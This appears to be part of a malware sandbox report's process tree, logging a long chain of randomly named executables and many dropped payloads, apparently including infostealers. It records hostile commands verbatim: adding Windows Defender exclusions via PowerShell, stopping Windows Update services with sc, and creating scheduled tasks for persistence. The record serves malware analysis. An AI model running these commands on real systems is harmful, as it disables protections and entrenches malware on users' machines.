        
        C:\Windows\system32\Ihoqgjmp.exe
        388⤵
        
        PID:17516
        
        C:\Windows\SysWOW64\Ilminh32.exe
        
        C:\Windows\system32\Ilminh32.exe
        389⤵
        
        PID:19124
        
        C:\Windows\SysWOW64\Jhfghi32.exe
        
        C:\Windows\system32\Jhfghi32.exe
        390⤵
        
        PID:24276
        
        C:\Windows\SysWOW64\Jemdgmdo.exe
        
        C:\Windows\system32\Jemdgmdo.exe
        391⤵
        
        PID:21948
        
        C:\Windows\SysWOW64\Jkliec32.exe
        
        C:\Windows\system32\Jkliec32.exe
        392⤵
        
        PID:22208
        
        C:\Windows\SysWOW64\Khbfdgmk.exe
        
        C:\Windows\system32\Khbfdgmk.exe
        393⤵
        
        PID:12872
        
        C:\Windows\SysWOW64\Kbmgbm32.exe
        
        C:\Windows\system32\Kbmgbm32.exe
        394⤵
        
        PID:12976
        
        C:\Windows\SysWOW64\Ldbjog32.exe
        
        C:\Windows\system32\Ldbjog32.exe
        395⤵
        
        PID:13424
        
        C:\Windows\SysWOW64\Lkalgq32.exe
        
        C:\Windows\system32\Lkalgq32.exe
        396⤵
        
        PID:15512
        
        C:\Windows\SysWOW64\Lkchlp32.exe
        
        C:\Windows\system32\Lkchlp32.exe
        397⤵
        
        PID:14420
        
        C:\Windows\SysWOW64\Mfkioiil.exe
        
        C:\Windows\system32\Mfkioiil.exe
        398⤵
        
        PID:20048
        
        C:\Windows\SysWOW64\Mkjomo32.exe
        
        C:\Windows\system32\Mkjomo32.exe
        399⤵
        
        PID:15856
        
        C:\Windows\SysWOW64\Mkohhoal.exe
        
        C:\Windows\system32\Mkohhoal.exe
        400⤵
        
        PID:13036
        
        C:\Windows\SysWOW64\Nlcacn32.exe
        
        C:\Windows\system32\Nlcacn32.exe
        401⤵
        
        PID:15556
        
        C:\Windows\SysWOW64\Nbniphec.exe
        
        C:\Windows\system32\Nbniphec.exe
        402⤵
        
        PID:1344
        
        C:\Windows\SysWOW64\Ofplaegd.exe
        
        C:\Windows\system32\Ofplaegd.exe
        403⤵
        
        PID:15036
        
        C:\Windows\SysWOW64\Oihkcpnm.exe
        
        C:\Windows\system32\Oihkcpnm.exe
        404⤵
        
        PID:15028
        
        C:\Windows\SysWOW64\Pimdoo32.exe
        
        C:\Windows\system32\Pimdoo32.exe
        405⤵
        
        PID:13516
        
        C:\Windows\SysWOW64\Pfcancgo.exe
        
        C:\Windows\system32\Pfcancgo.exe
        406⤵
        
        PID:23204
        
        C:\Windows\SysWOW64\Qfjgnb32.exe
        
        C:\Windows\system32\Qfjgnb32.exe
        407⤵
        
        PID:16068
        
        C:\Windows\SysWOW64\Amflql32.exe
        
        C:\Windows\system32\Amflql32.exe
        408⤵
        
        PID:22424
        
        C:\Windows\SysWOW64\Aojenc32.exe
        
        C:\Windows\system32\Aojenc32.exe
        409⤵
        
        PID:22860
        
        C:\Windows\SysWOW64\Bcaajqhi.exe
        
        C:\Windows\system32\Bcaajqhi.exe
        410⤵
        
        PID:23120
        
        C:\Windows\SysWOW64\Cghmfnfd.exe
        
        C:\Windows\system32\Cghmfnfd.exe
        411⤵
        
        PID:19776
        
        C:\Windows\SysWOW64\Dfpfmj32.exe
        
        C:\Windows\system32\Dfpfmj32.exe
        412⤵
        
        PID:14724
        
        C:\Windows\SysWOW64\Dfbcbigg.exe
        
        C:\Windows\system32\Dfbcbigg.exe
        413⤵
        
        PID:14384
        
        C:\Windows\SysWOW64\Egiemk32.exe
        
        C:\Windows\system32\Egiemk32.exe
        414⤵
        
        PID:15684
        
        C:\Windows\SysWOW64\Eqjmlpfh.exe
        
        C:\Windows\system32\Eqjmlpfh.exe
        415⤵
        
        PID:18376
        
        C:\Windows\SysWOW64\Fmfglphf.exe
        
        C:\Windows\system32\Fmfglphf.exe
        416⤵
        
        PID:21520
        
        C:\Windows\SysWOW64\Gahinn32.exe
        
        C:\Windows\system32\Gahinn32.exe
        417⤵
        
        PID:21708
        
        C:\Windows\SysWOW64\Gjhdgb32.exe
        
        C:\Windows\system32\Gjhdgb32.exe
        418⤵
        
        PID:14948
        
        C:\Windows\SysWOW64\Hhqnlf32.exe
        
        C:\Windows\system32\Hhqnlf32.exe
        419⤵
        
        PID:20936
        
        C:\Windows\SysWOW64\Ipeefg32.exe
        
        C:\Windows\system32\Ipeefg32.exe
        420⤵
        
        PID:14788
        
        C:\Windows\SysWOW64\Jdjdmdkc.exe
        
        C:\Windows\system32\Jdjdmdkc.exe
        421⤵
        
        PID:15992
        
        C:\Windows\SysWOW64\Jkfion32.exe
        
        C:\Windows\system32\Jkfion32.exe
        422⤵
        
        PID:13120
        
        C:\Windows\SysWOW64\Jhmfnbmd.exe
        
        C:\Windows\system32\Jhmfnbmd.exe
        423⤵
        
        PID:14004
        
        C:\Windows\SysWOW64\Kgbcpnbl.exe
        
        C:\Windows\system32\Kgbcpnbl.exe
        424⤵
        
        PID:19788
        
        C:\Windows\SysWOW64\Kpmdncfj.exe
        
        C:\Windows\system32\Kpmdncfj.exe
        425⤵
        
        PID:25428
        
        C:\Windows\SysWOW64\Lhkbpp32.exe
        
        C:\Windows\system32\Lhkbpp32.exe
        426⤵
        
        PID:20164
        
        C:\Windows\SysWOW64\Loidgi32.exe
        
        C:\Windows\system32\Loidgi32.exe
        427⤵
        
        PID:16828
        
        C:\Windows\SysWOW64\Mkbabj32.exe
        
        C:\Windows\system32\Mkbabj32.exe
        428⤵
        
        PID:15304
        
        C:\Windows\SysWOW64\Mgibgkna.exe
        
        C:\Windows\system32\Mgibgkna.exe
        429⤵
        
        PID:13460
        
        C:\Windows\SysWOW64\Noljdf32.exe
        
        C:\Windows\system32\Noljdf32.exe
        430⤵
        
        PID:14352
        
        C:\Windows\SysWOW64\Nenlgmni.exe
        
        C:\Windows\system32\Nenlgmni.exe
        431⤵
        
        PID:21360
        
        C:\Windows\SysWOW64\Oebebl32.exe
        
        C:\Windows\system32\Oebebl32.exe
        432⤵
        
        PID:16588
        
        C:\Windows\SysWOW64\Oohipe32.exe
        
        C:\Windows\system32\Oohipe32.exe
        433⤵
        
        PID:15820
        
        C:\Windows\SysWOW64\Ogekjgea.exe
        
        C:\Windows\system32\Ogekjgea.exe
        434⤵
        
        PID:15716
        
        C:\Windows\SysWOW64\Pnfigp32.exe
        
        C:\Windows\system32\Pnfigp32.exe
        435⤵
        
        PID:17768
        
        C:\Windows\SysWOW64\Qpmlabha.exe
        
        C:\Windows\system32\Qpmlabha.exe
        436⤵
        
        PID:24336
        
        C:\Windows\SysWOW64\Ahmjac32.exe
        
        C:\Windows\system32\Ahmjac32.exe
        437⤵
        
        PID:24312
        
        C:\Windows\SysWOW64\Aiocqf32.exe
        
        C:\Windows\system32\Aiocqf32.exe
        438⤵
        
        PID:16468
        
        C:\Windows\SysWOW64\Bbidokke.exe
        
        C:\Windows\system32\Bbidokke.exe
        439⤵
        
        PID:16276
        
        C:\Windows\SysWOW64\Bbnnjk32.exe
        
        C:\Windows\system32\Bbnnjk32.exe
        440⤵
        
        PID:19620
        
        C:\Windows\SysWOW64\Clpeio32.exe
        
        C:\Windows\system32\Clpeio32.exe
        441⤵
        
        PID:22380
        
        C:\Windows\SysWOW64\Dikkcbng.exe
        
        C:\Windows\system32\Dikkcbng.exe
        442⤵
        
        PID:16920
        
        C:\Windows\SysWOW64\Dcjfmg32.exe
        
        C:\Windows\system32\Dcjfmg32.exe
        443⤵
        
        PID:2984
        
        C:\Windows\SysWOW64\Elegkl32.exe
        
        C:\Windows\system32\Elegkl32.exe
        444⤵
        
        PID:14952
        
        C:\Windows\SysWOW64\Eccice32.exe
        
        C:\Windows\system32\Eccice32.exe
        445⤵
        
        PID:14456
        
        C:\Windows\SysWOW64\Fqjfbicl.exe
        
        C:\Windows\system32\Fqjfbicl.exe
        446⤵
        
        PID:17664
        
        C:\Windows\SysWOW64\Fjdgpo32.exe
        
        C:\Windows\system32\Fjdgpo32.exe
        447⤵
        
        PID:17248
        
        C:\Windows\SysWOW64\Gohfid32.exe
        
        C:\Windows\system32\Gohfid32.exe
        448⤵
        
        PID:19476
        
        C:\Windows\SysWOW64\Hflalmok.exe
        
        C:\Windows\system32\Hflalmok.exe
        449⤵
        
        PID:17300
        
        C:\Windows\SysWOW64\Hmjbdgbc.exe
        
        C:\Windows\system32\Hmjbdgbc.exe
        450⤵
        
        PID:18152
        
        C:\Windows\SysWOW64\Imaidflk.exe
        
        C:\Windows\system32\Imaidflk.exe
        451⤵
        
        PID:22636
        
        C:\Windows\SysWOW64\Ipdnlq32.exe
        
        C:\Windows\system32\Ipdnlq32.exe
        452⤵
        
        PID:17020
        
        C:\Windows\SysWOW64\Ifacnjmc.exe
        
        C:\Windows\system32\Ifacnjmc.exe
        453⤵
        
        PID:13380
        
        C:\Windows\SysWOW64\Jbjqikpe.exe
        
        C:\Windows\system32\Jbjqikpe.exe
        454⤵
        
        PID:16960
        
        C:\Windows\SysWOW64\Kaddma32.exe
        
        C:\Windows\system32\Kaddma32.exe
        455⤵
        
        PID:16908
        
        C:\Windows\SysWOW64\Kdgidlkh.exe
        
        C:\Windows\system32\Kdgidlkh.exe
        456⤵
        
        PID:16816
        
        C:\Windows\SysWOW64\Liikgb32.exe
        
        C:\Windows\system32\Liikgb32.exe
        457⤵
        
        PID:18020
        
        C:\Windows\SysWOW64\Laemco32.exe
        
        C:\Windows\system32\Laemco32.exe
        458⤵
        
        PID:25880
        
        C:\Windows\SysWOW64\Mkbkgc32.exe
        
        C:\Windows\system32\Mkbkgc32.exe
        459⤵
        
        PID:22192
        
        C:\Windows\SysWOW64\Maqlom32.exe
        
        C:\Windows\system32\Maqlom32.exe
        460⤵
        
        PID:17092
        
        C:\Windows\SysWOW64\Nqhffi32.exe
        
        C:\Windows\system32\Nqhffi32.exe
        461⤵
        
        PID:17648
        
        C:\Windows\SysWOW64\Nkdpda32.exe
        
        C:\Windows\system32\Nkdpda32.exe
        462⤵
        
        PID:17480
        
        C:\Windows\SysWOW64\Okijop32.exe
        
        C:\Windows\system32\Okijop32.exe
        463⤵
        
        PID:19824
        
        C:\Windows\SysWOW64\Ogpjda32.exe
        
        C:\Windows\system32\Ogpjda32.exe
        464⤵
        
        PID:17976
        
        C:\Windows\SysWOW64\Pcnajaeg.exe
        
        C:\Windows\system32\Pcnajaeg.exe
        465⤵
        
        PID:18284
        
        C:\Windows\SysWOW64\Pncegjem.exe
        
        C:\Windows\system32\Pncegjem.exe
        466⤵
        
        PID:21276
        
        C:\Windows\SysWOW64\Pnfbmjck.exe
        
        C:\Windows\system32\Pnfbmjck.exe
        467⤵
        
        PID:16480
        
        C:\Windows\SysWOW64\Pbckbhia.exe
        
        C:\Windows\system32\Pbckbhia.exe
        468⤵
        
        PID:24916
        
        C:\Windows\SysWOW64\Pklokn32.exe
        
        C:\Windows\system32\Pklokn32.exe
        469⤵
        
        PID:19264
        
        C:\Windows\SysWOW64\Qakdidlf.exe
        
        C:\Windows\system32\Qakdidlf.exe
        470⤵
        
        PID:18988
        
        C:\Windows\SysWOW64\Abmnigaf.exe
        
        C:\Windows\system32\Abmnigaf.exe
        471⤵
        
        PID:20772
        
        C:\Windows\SysWOW64\Aepcpa32.exe
        
        C:\Windows\system32\Aepcpa32.exe
        472⤵
        
        PID:12372
        
        C:\Windows\SysWOW64\Anhhigbe.exe
        
        C:\Windows\system32\Anhhigbe.exe
        473⤵
        
        PID:18968
        
        C:\Windows\SysWOW64\Aaiqkb32.exe
        
        C:\Windows\system32\Aaiqkb32.exe
        474⤵
        
        PID:22952
        
        C:\Windows\SysWOW64\Balmpb32.exe
        
        C:\Windows\system32\Balmpb32.exe
        475⤵
        
        PID:18444
        
        C:\Windows\SysWOW64\Blcncjkg.exe
        
        C:\Windows\system32\Blcncjkg.exe
        476⤵
        
        PID:22440
        
        C:\Windows\SysWOW64\Ceqlgonb.exe
        
        C:\Windows\system32\Ceqlgonb.exe
        477⤵
        
        PID:5232
        
        C:\Windows\SysWOW64\Clonoiaj.exe
        
        C:\Windows\system32\Clonoiaj.exe
        478⤵
        
        PID:21340
        
        C:\Windows\SysWOW64\Ckggeedo.exe
        
        C:\Windows\system32\Ckggeedo.exe
        479⤵
        
        PID:18288
        
        C:\Windows\SysWOW64\Doijgb32.exe
        
        C:\Windows\system32\Doijgb32.exe
        480⤵
        
        PID:23928
        
        C:\Windows\SysWOW64\Elbckfad.exe
        
        C:\Windows\system32\Elbckfad.exe
        481⤵
        
        PID:18084
        
        C:\Windows\SysWOW64\Eafbdlid.exe
        
        C:\Windows\system32\Eafbdlid.exe
        482⤵
        
        PID:17764
        
        C:\Windows\SysWOW64\Folocpfk.exe
        
        C:\Windows\system32\Folocpfk.exe
        483⤵
        
        PID:20840
        
        C:\Windows\SysWOW64\Ffhdejke.exe
        
        C:\Windows\system32\Ffhdejke.exe
        484⤵
        
        PID:18088
        
        C:\Windows\SysWOW64\Fldigcao.exe
        
        C:\Windows\system32\Fldigcao.exe
        485⤵
        
        PID:19356
        
        C:\Windows\SysWOW64\Goebionp.exe
        
        C:\Windows\system32\Goebionp.exe
        486⤵
        
        PID:20072
        
        C:\Windows\SysWOW64\Gbfkkj32.exe
        
        C:\Windows\system32\Gbfkkj32.exe
        487⤵
        
        PID:18684
        
        C:\Windows\SysWOW64\Gojldn32.exe
        
        C:\Windows\system32\Gojldn32.exe
        488⤵
        
        PID:20304
        
        C:\Windows\SysWOW64\Gdgdme32.exe
        
        C:\Windows\system32\Gdgdme32.exe
        489⤵
        
        PID:17640
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 17640 -s 440
        490⤵
        Program crash
        
        PID:19600
- - C:\Users\Admin\AppData\Local\Temp\Files\winbox.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\winbox.exe"
    3⤵
    PID:18992
- - C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe"
    3⤵
    PID:18112
- - C:\Users\Admin\AppData\Local\Temp\Files\FreeYoutubeDownloader.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\FreeYoutubeDownloader.exe"
    3⤵
    PID:24684
  - - C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe
      "C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe"
      4⤵
      PID:19504
    - - C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe
        
        "C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe"
        5⤵
        
        PID:11044
    - - C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe
        
        "C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe"
        5⤵
        
        PID:20192
- - C:\Users\Admin\AppData\Local\Temp\Files\robotic.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\robotic.exe"
    3⤵
    PID:25420
- - C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"
    3⤵
    PID:21612
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Svchost\Svchost.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:20768
- - C:\Users\Admin\AppData\Local\Temp\Files\uhigdbf.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\uhigdbf.exe"
    3⤵
    PID:22820
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
      4⤵
      PID:22620
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.exe
        
        clamer.exe -priverdD
        5⤵
        
        PID:16764
      - C:\Users\Admin\AppData\Local\Temp\RarSFX1\fseawd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\fseawd.exe"
        6⤵
        
        PID:25748
- - C:\Users\Admin\AppData\Local\Temp\Files\tt.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\tt.exe"
    3⤵
    PID:25396
  - - C:\Windows\sysmablsvr.exe
      C:\Windows\sysmablsvr.exe
      4⤵
      PID:2344
    - - C:\Users\Admin\AppData\Local\Temp\2550717004.exe
        
        C:\Users\Admin\AppData\Local\Temp\2550717004.exe
        5⤵
        
        PID:9424
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:21652
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:15116
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        
        PID:7108
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:3424
    - - C:\Users\Admin\AppData\Local\Temp\347118217.exe
        
        C:\Users\Admin\AppData\Local\Temp\347118217.exe
        5⤵
        
        PID:8052
    - - C:\Users\Admin\AppData\Local\Temp\1853211777.exe
        
        C:\Users\Admin\AppData\Local\Temp\1853211777.exe
        5⤵
        
        PID:7860
    - - C:\Users\Admin\AppData\Local\Temp\35015695.exe
        
        C:\Users\Admin\AppData\Local\Temp\35015695.exe
        5⤵
        
        PID:13256
- - C:\Users\Admin\AppData\Local\Temp\Files\7777.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\7777.exe"
    3⤵
    PID:15144
- - C:\Users\Admin\AppData\Local\Temp\Files\Vn70wVxW.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Vn70wVxW.exe"
    3⤵
    PID:9052
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:1792
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:8032
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:8752
- - C:\Users\Admin\AppData\Local\Temp\Files\Client_protected.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Client_protected.exe"
    3⤵
    PID:8372
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8372 -s 1400
      4⤵
      Program crash
      PID:13332
- - C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"
    3⤵
    PID:4040
- - C:\Users\Admin\AppData\Local\Temp\Files\solandra.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\solandra.exe"
    3⤵
    PID:19116
- - C:\Users\Admin\AppData\Local\Temp\Files\1111.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\1111.exe"
    3⤵
    PID:22276
- - C:\Users\Admin\AppData\Local\Temp\Files\Identification-1.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Identification-1.exe"
    3⤵
    PID:17224
- - C:\Users\Admin\AppData\Local\Temp\Files\s.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\s.exe"
    3⤵
    PID:14120
  - - C:\Windows\SysWOW64\calc.exe
      calc.exe
      4⤵
      PID:18636
- - C:\Users\Admin\AppData\Local\Temp\Files\LummaC22222.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\LummaC22222.exe"
    3⤵
    PID:18652
- - C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe"
    3⤵
    PID:22096
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      PID:12320
- - C:\Users\Admin\AppData\Local\Temp\Files\2klz.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\2klz.exe"
    3⤵
    PID:9856
  - - C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
      4⤵
      PID:18808
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2vjdciTK6XT6.bat" "
        5⤵
        
        PID:6476
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:4608
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5608
      - C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        6⤵
        
        PID:1680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\edNOp7QDV25R.bat" "
        7⤵
        
        PID:14740
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:5240
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:16860
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        8⤵
        
        PID:20924
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2twu1aoIixDZ.bat" "
        9⤵
        
        PID:19304
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:10032
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:15960
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        10⤵
        
        PID:4432
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nSwYoWopbRcm.bat" "
        11⤵
        
        PID:10704
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:23636
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:23464
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        12⤵
        
        PID:13088
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9jcHVjMuLF5T.bat" "
        13⤵
        
        PID:20988
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:24408
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:23032
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        14⤵
        
        PID:25716
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cuq3u0D2PlAg.bat" "
        15⤵
        
        PID:26708
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        16⤵
        
        PID:27132
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:27316
        
        C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        16⤵
        
        PID:6036
- - C:\Users\Admin\AppData\Local\Temp\Files\t1.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\t1.exe"
    3⤵
    PID:6376
  - - C:\Windows\sysklnorbcv.exe
      C:\Windows\sysklnorbcv.exe
      4⤵
      PID:6248
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        
        PID:7840
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10452
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
        5⤵
        
        PID:12356
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:3792
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:6308
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:13260
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        6⤵
        Launches sc.exe
        
        PID:11456
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS
        6⤵
        Launches sc.exe
        
        PID:8184
    - - C:\Users\Admin\AppData\Local\Temp\2429815840.exe
        
        C:\Users\Admin\AppData\Local\Temp\2429815840.exe
        5⤵
        
        PID:6192
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:19212
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:12884
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        
        PID:14044
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:13204
    - - C:\Users\Admin\AppData\Local\Temp\2304810729.exe
        
        C:\Users\Admin\AppData\Local\Temp\2304810729.exe
        5⤵
        
        PID:15384
    - - C:\Users\Admin\AppData\Local\Temp\55295512.exe
        
        C:\Users\Admin\AppData\Local\Temp\55295512.exe
        5⤵
        
        PID:14100
    - - C:\Users\Admin\AppData\Local\Temp\967332453.exe
        
        C:\Users\Admin\AppData\Local\Temp\967332453.exe
        5⤵
        
        PID:11488
- - C:\Users\Admin\AppData\Local\Temp\Files\jsawdtyjde.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\jsawdtyjde.exe"
    3⤵
    PID:23780
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\1.bat" "
      4⤵
      PID:7380
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\clamer.exe
        
        clamer.exe -priverdD
        5⤵
        
        PID:7972
      - C:\Users\Admin\AppData\Local\Temp\RarSFX2\thkdh.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\thkdh.exe"
        6⤵
        
        PID:23776
- - C:\Users\Admin\AppData\Local\Temp\Files\c1.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\c1.exe"
    3⤵
    PID:7656
- - C:\Users\Admin\AppData\Local\Temp\Files\newfile.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\newfile.exe"
    3⤵
    PID:6124
- - C:\Users\Admin\AppData\Local\Temp\Files\bin.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\bin.exe"
    3⤵
    PID:7848
- - C:\Users\Admin\AppData\Local\Temp\Files\3.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\3.exe"
    3⤵
    PID:9880
- - C:\Users\Admin\AppData\Local\Temp\Files\ohtie89k.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ohtie89k.exe"
    3⤵
    PID:9804
  - - C:\ProgramData\windows.exe
      "C:\ProgramData\windows.exe"
      4⤵
      PID:11552
  - - C:\ProgramData\service.exe
      "C:\ProgramData\service.exe"
      4⤵
      PID:7820
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "service" /tr "C:\Users\Admin\AppData\Roaming\service.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:10148
- - C:\Users\Admin\AppData\Local\Temp\Files\elm.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\elm.exe"
    3⤵
    PID:10236
  - - C:\Users\Admin\AppData\Local\Temp\Files\elm.exe
      C:\Users\Admin\AppData\Local\Temp\Files\elm.exe
      4⤵
      PID:10820
- - C:\Users\Admin\AppData\Local\Temp\Files\1.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\1.exe"
    3⤵
    PID:23628
- - C:\Users\Admin\AppData\Local\Temp\Files\Journal-https.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Journal-https.exe"
    3⤵
    PID:6052
